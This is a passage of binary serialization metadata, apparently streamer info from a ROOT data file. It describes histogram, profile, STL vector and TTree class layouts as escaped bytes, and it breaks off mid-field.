collection\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int\x00@\x00\x00L\x80\x00\x00[@\x00\x00D\x00\t@\x00\x00\x15\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x07TString\x00\x00\x01t\x19\x00\x00\x00\x02@\x00\x00\x1d\x80\x00\x00\x9b@\x00\x00\x15\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x03\xfc\x80\x00\x00[@\x00\x03\xf4\x00\t@\x00\x00\x18\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\nTProfile2D\x006\xa1B\xac\x00\x00\x00\x07@\x00\x03\xca\x80\x00\x00\x9b@\x00\x03\xc2\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00@\x00\x00|\x80\x00\x00\xc6@\x00\x00t\x00\x03@\x00\x00j\x00\x04@\x00\x00;\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x04TH2D)2-Dim histograms (one double per channel)\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\xba\x82\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x03@\x00\x00r\x80\x00\x08\xbf@\x00\x00j\x00\x02@\x00\x00d\x00\x04@\x00\x002\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfBinEntries\x19number of entries per bin\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayD@\x00\x00s\x80\x00\x02\x08@\x00\x00k\x00\x02@\x00\x00e\x00\x04@\x00\x000\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfErrorMode\x18Option to compute errors\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\nEErrorType@\x00\x00k\x80\x00\x02\x08@\x00\x00c\x00\x02@\x00\x00]\x00\x04@\x00\x00,\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fZmin\x19Lower limit in Z (if set)\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00k\x80\x00\x02\x08@\x00\x00c\x00\x02@\x00\x00]\x00\x04@\x00\x00,\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fZmax\x19Upper limit in Z (if set)\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00i\x80\x00\x02\x08@\x00\x00a\x00\x02@\x00\x00[\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fTsumwz\x15Total Sum of weight*Z\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fTsumwz2\x17Total Sum of weight*Z*Z\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00\x81\x80\x00\x08\xbf@\x00\x00y\x00\x02@\x00\x00s\x00\x04@\x00\x00A\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfBinSumw2*Array of sum of squares of weights per bin\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayD\x00@\x00\x01#\x80\x00\x00[@\x00\x01\x1b\x00\t@\x00\x00\x12\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x04TH2D\x00\x7f\xba\x82\xf0\x00\x00\x00\x03@\x00\x00\xf7\x80\x00\x00\x9b@\x00\x00\xef\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00l\x80\x00\x00\xc6@\x00\x00d\x00\x03@\x00\x00Z\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03TH2\x1a2-Dim histogram base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x824\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x04@\x00\x00f\x80\x00\x00\xc6@\x00\x00^\x00\x03@\x00\x00T\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TArrayD\x10Array of doubles\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00q9\xef4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01\x00@\x00\x02n\x80\x00\x00[@\x00\x02f\x00\t@\x00\x00\x11\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x03TH2\x00\x01\x824\x7f\x00\x00\x00\x04@\x00\x02C\x80\x00\x00\x9b@\x00\x02;\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00@\x00\x00l\x80\x00\x00\xc6@\x00\x00d\x00\x03@\x00\x00Z\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03TH1\x1a1-Dim histogram base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c7@\xc4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x08@\x00\x00e\x80\x00\x02\x08@\x00\x00]\x00\x02@\x00\x00W\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfScalefactor\x0cScale factor\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00i\x80\x00\x02\x08@\x00\x00a\x00\x02@\x00\x00[\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fTsumwy\x15Total Sum of weight*Y\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fTsumwy2\x17Total Sum of weight*Y*Y\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fTsumwxy\x17Total Sum of weight*X*Y\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double\x00@\x00\x03\xfc\x80\x00\x00[@\x00\x03\xf4\x00\t@\x00\x00\x18\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\nTProfile3D\x00\xf6\x0ch\x14\x00\x00\x00\x07@\x00\x03\xca\x80\x00\x00\x9b@\x00\x03\xc2\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00@\x00\x00|\x80\x00\x00\xc6@\x00\x00t\x00\x03@\x00\x00j\x00\x04@\x00\x00;\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x04TH3D)3-Dim histograms (one double per channel)\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xb9\xff\x86\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x03@\x00\x00r\x80\x00\x08\xbf@\x00\x00j\x00\x02@\x00\x00d\x00\x04@\x00\x002\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfBinEntries\x19number of entries per bin\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayD@\x00\x00s\x80\x00\x02\x08@\x00\x00k\x00\x02@\x00\x00e\x00\x04@\x00\x000\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfErrorMode\x18Option to compute errors\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\nEErrorType@\x00\x00k\x80\x00\x02\x08@\x00\x00c\x00\x02@\x00\x00]\x00\x04@\x00\x00,\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fTmin\x19Lower limit in T (if set)\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00k\x80\x00\x02\x08@\x00\x00c\x00\x02@\x00\x00]\x00\x04@\x00\x00,\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fTmax\x19Upper limit in T (if set)\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00i\x80\x00\x02\x08@\x00\x00a\x00\x02@\x00\x00[\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fTsumwt\x15Total Sum of weight*T\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fTsumwt2\x17Total Sum of weight*T*T\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00\x81\x80\x00\x08\xbf@\x00\x00y\x00\x02@\x00\x00s\x00\x04@\x00\x00A\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfBinSumw2*Array of sum of squares of weights per bin\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayD\x00@\x00\x01#\x80\x00\x00[@\x00\x01\x1b\x00\t@\x00\x00\x12\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x04TH3D\x00d\xb9\xff\x86\x00\x00\x00\x03@\x00\x00\xf7\x80\x00\x00\x9b@\x00\x00\xef\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00l\x80\x00\x00\xc6@\x00\x00d\x00\x03@\x00\x00Z\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03TH3\x1a3-Dim histogram base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00B\xd2D_\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x05@\x00\x00f\x80\x00\x00\xc6@\x00\x00^\x00\x03@\x00\x00T\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TArrayD\x10Array of doubles\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00q9\xef4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01\x00@\x00\x04(\x80\x00\x00[@\x00\x04 \x00\t@\x00\x00\x11\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x03TH3\x00B\xd2D_\x00\x00\x00\x05@\x00\x03\xfd\x80\x00\x00\x9b@\x00\x03\xf5\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\x00@\x00\x00l\x80\x00\x00\xc6@\x00\x00d\x00\x03@\x00\x00Z\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03TH1\x1a1-Dim histogram base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c7@\xc4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x08@\x00\x00b\x80\x00\x00\xc6@\x00\x00Z\x00\x03@\x00\x00P\x00\x04@\x00\x00!\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06TAtt3D\r3D attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00uz\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00i\x80\x00\x02\x08@\x00\x00a\x00\x02@\x00\x00[\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fTsumwy\x15Total Sum of weight*Y\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fTsumwy2\x17Total Sum of weight*Y*Y\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fTsumwxy\x17Total Sum of weight*X*Y\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00i\x80\x00\x02\x08@\x00\x00a\x00\x02@\x00\x00[\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fTsumwz\x15Total Sum of weight*Z\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fTsumwz2\x17Total Sum of weight*Z*Z\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fTsumwxz\x17Total Sum of weight*X*Z\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fTsumwyz\x17Total Sum of weight*Y*Z\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double\x00@\x00\x00K\x80\x00\x00[@\x00\x00C\x00\t@\x00\x00\x14\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x06TAtt3D\x00\x00\x00uz\x00\x00\x00\x01@\x00\x00\x1d\x80\x00\x00\x9b@\x00\x00\x15\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\xf1\x80\x00\x00[@\x00\x00\xe9\x00\t@\x00\x00\x19\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x0bvector<int>\x00\x00\x98;\x88\x00\x00\x00\x06@\x00\x00\xbe\x80\x00\x00\x9b@\x00\x00\xb6\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00@\x00\x00\x9d\xff\xff\xff\xffTStreamerSTL\x00@\x00\x00\x88\x00\x03@\x00\x00z\x00\x04@\x00\x00D\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x04This2<Int_t> Used to call the proper TStreamerInfo case\x00\x00\x01\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0bvector<int>\x00\x00\x00\x01\x00\x00\x00\x03\x00@\x00\x00\xed\x80\x00\x00[@\x00\x00\xe5\x00\t@\x00\x00\x1c\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x0evector<double>\x00\x10\x0eCd\x00\x00\x00\x06@\x00\x00\xb7\x80\x00\x00\x9b@\x00\x00\xaf\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00@\x00\x00\x96\x80\x00A\x08@\x00\x00\x8e\x00\x03@\x00\x00\x80\x00\x04@\x00\x00G\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x04This5<Double_t> Used to call the proper TStreamerInfo case\x00\x00\x01\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0evector<double>\x00\x00\x00\x01\x00\x00\x00\x08\x00@\x00\x00\xea\x80\x00\x00[@\x00\x00\xe2\x00\t@\x00\x00\x1b\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\rvector<float>\x00\x05Z\x16\x9b\x00\x00\x00\x06@\x00\x00\xb5\x80\x00\x00\x9b@\x00\x00\xad\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00@\x00\x00\x94\x80\x00A\x08@\x00\x00\x8c\x00\x03@\x00\x00~\x00\x04@\x00\x00F\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x04This4<Float_t> Used to call the proper TStreamerInfo case\x00\x00\x01\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\rvector<float>\x00\x00\x00\x01\x00\x00\x00\x05\x00@\x00\x00\xe7\x80\x00\x00[@\x00\x00\xdf\x00\t@\x00\x00\x1a\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x0cvector<long>\x00\x01\xc8\xb4)\x00\x00\x00\x06@\x00\x00\xb3\x80\x00\x00\x9b@\x00\x00\xab\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00@\x00\x00\x92\x80\x00A\x08@\x00\x00\x8a\x00\x03@\x00\x00|\x00\x04@\x00\x00E\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x04This3<Long_t> Used to call the proper TStreamerInfo case\x00\x00\x01\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0cvector<long>\x00\x00\x00\x01\x00\x00\x00\x04\x00@\x00\x00\xe7\x80\x00\x00[@\x00\x00\xdf\x00\t@\x00\x00\x1a\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x0cvector<char>\x00\x01\xc8\xb0?\x00\x00\x00\x06@\x00\x00\xb3\x80\x00\x00\x9b@\x00\x00\xab\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00@\x00\x00\x92\x80\x00A\x08@\x00\x00\x8a\x00\x03@\x00\x00|\x00\x04@\x00\x00E\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x04This3<Char_t> Used to call the proper TStreamerInfo case\x00\x00\x01\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0cvector<char>\x00\x00\x00\x01\x00\x00\x00\x01\x00@\x00\x00\xea\x80\x00\x00[@\x00\x00\xe2\x00\t@\x00\x00\x1b\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\rvector<short>\x00\x05Z"G\x00\x00\x00\x06@\x00\x00\xb5\x80\x00\x00\x9b@\x00\x00\xad\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00@\x00\x00\x94\x80\x00A\x08@\x00\x00\x8c\x00\x03@\x00\x00~\x00\x04@\x00\x00F\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x04This4<Short_t> Used to call the proper TStreamerInfo case\x00\x00\x01\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\rvector<short>\x00\x00\x00\x01\x00\x00\x00\x02\x00@\x00\x00\xeb\x80\x00\x00[@\x00\x00\xe3\x00\t@\x00\x00\x1c\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x0evector<string>\x00\x10\x0er\xbc\x00\x00\x00\x06@\x00\x00\xb5\x80\x00\x00\x9b@\x00\x00\xad\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00@\x00\x00\x94\x80\x00A\x08@\x00\x00\x8c\x00\x03@\x00\x00~\x00\x04@\x00\x00E\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x04This3<string> Used to call the proper TStreamerInfo case\x00\x00\x01\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0evector<string>\x00\x00\x00\x01\x00\x00\x00=\x00@\x00\x11\xe6\x80\x00\x00[@\x00\x11\xde\x00\t@\x00\x00\x13\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x05TTree\x00rd\xe0\x7f\x00\x00\x00\x14@\x00\x11\xb9\x80\x00\x00\x9b@\x00\x11\xb1\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00!\x00\x00\x00\x00@\x00\x00\x7f\x80\x00\x00\xc6@\x00\x00w\x00\x03@\x00\x00m\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06TNamed*The basis for a named object (name, title)\x00\x00\x00C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdf\xb7J<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00f\x80\x00\x00\xc6@\x00\x00^\x00\x03@\x00\x00T\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08TAttLine\x0fLine attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x94\x07EI\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00k\x80\x00\x00\xc6@\x00\x00c\x00\x03@\x00\x00Y\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08TAttFill\x14Fill area attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd9*\x92\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00j\x80\x00\x00\xc6@\x00\x00b\x00\x03@\x00\x00X\x00\x04@\x00\x00)\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nTAttMarker\x11Marker attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00)\x1d\x8b\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00h\x80\x00\x02\x08@\x00\x00`\x00\x02@\x00\x00Z\x00\x04@\x00\x00\'\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fEntries\x11Number of entries\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x90\x80\x00\x02\x08@\x00\x00\x88\x00\x02@\x00\x00\x82\x00\x04@\x00\x00O\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfTotBytes8Total number of bytes in all branches before compression\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x8f\x80\x00\x02\x08@\x00\x00\x87\x00\x02@\x00\x00\x81\x00\x04@\x00\x00N\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfZipBytes7Total number of bytes in all branches after compression\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00s\x80\x00\x02\x08@\x00\x00k\x00\x02@\x00\x00e\x00\x04@\x00\x002\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfSavedBytes\x19Number of autosaved 